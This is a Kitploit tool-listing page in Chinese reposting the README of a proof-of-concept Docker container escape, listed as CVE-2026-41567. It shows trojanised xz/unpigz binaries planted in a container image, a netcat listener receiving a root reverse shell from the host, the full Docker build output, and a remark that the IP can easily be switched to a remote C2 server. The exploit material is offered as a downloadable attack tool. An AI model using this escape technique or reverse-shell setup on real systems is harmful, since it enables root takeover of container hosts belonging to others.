Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-41567 — 通过植入木马的 xz/unpigz 二进制文件,利用 CVE-2026-41567 实现 Docker 逃逸,从而从容器内部在宿主机上获得 root shell。 | Kitploit
工具/GitHubGitHub/berdav/cve-2026-41567
漏洞分析漏洞利用容器逃逸
GitHubberdav/cve-2026-41567

CVE-2026-41567

通过植入木马的 xz/unpigz 二进制文件,利用 CVE-2026-41567 实现 Docker 逃逸,从而从容器内部在宿主机上获得 root shell。

查看仓库
1天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-41567 1day

Docker 逃逸漏洞 CVE-2026-41567 的 1day。

这是一个使用特洛伊木马化的 xz / unpigz 进行 Docker 逃逸的演示。

它可以很容易地修改为远程使用(例如,只需将 Docker 默认 IP 修改为远程 C2 即可)。

有关该漏洞利用的更多信息,请参见此处

PoC

在主机上运行 netcat 监听端口 50005

root@kitploit:~
ubuntu@ubuntu-noble:~/CVE-2026-41567$ nc -vlp  50005
Listening on 0.0.0.0 50005
Connection received on ubuntu-noble 35722
# whoami
root
# cat /etc/hostname
ubuntu-noble
# exit

然后执行 test.sh 脚本。 如果漏洞利用成功,你将立即获得 root shell。

root@kitploit:~
ubuntu@ubuntu-noble:~/CVE-2026-41567$ sudo ./test.sh
DEPRECATED: The legacy builder is deprecated and will be removed in a future release.
            Install the buildx component to build images with BuildKit:
            https://docs.docker.com/go/buildx/

Sending build context to Docker daemon  19.97kB
Step 1/7 : FROM debian
 ---> 34cd9e9fd437
Step 2/7 : RUN apt update && apt install -y ncat
 ---> Using cache
 ---> c85c9eb10bff
Step 3/7 : COPY exploit.sh /usr/bin/xz
 ---> Using cache
 ---> b84efa8058e7
Step 4/7 : RUN chmod +x /usr/bin/xz
 ---> Using cache
 ---> 423b0e1891a6
Step 5/7 : COPY exploit.sh /usr/bin/unpigz
 ---> Using cache
 ---> 74eff85cf988
Step 6/7 : RUN chmod +x /usr/bin/unpigz
 ---> Using cache
 ---> 2f773fa12931
Step 7/7 : CMD [ "sleep", "9999999" ]
 ---> Using cache
 ---> 7b99f12dbe8d
Successfully built 7b99f12dbe8d
Successfully tagged cve-2026-41567:latest
cve-2026-41567
5679a4dc643c65a20039de693fad1f1caeea7fe5760b5c4049d1d4f37f5ab825
tar: Removing leading `/' from member names
/etc/hosts
Successfully copied 0B to cve-2026-41567:/tmp

请注意,你需要有权限与 Docker 守护进程通信(通常需要 root 权限)。

下载工具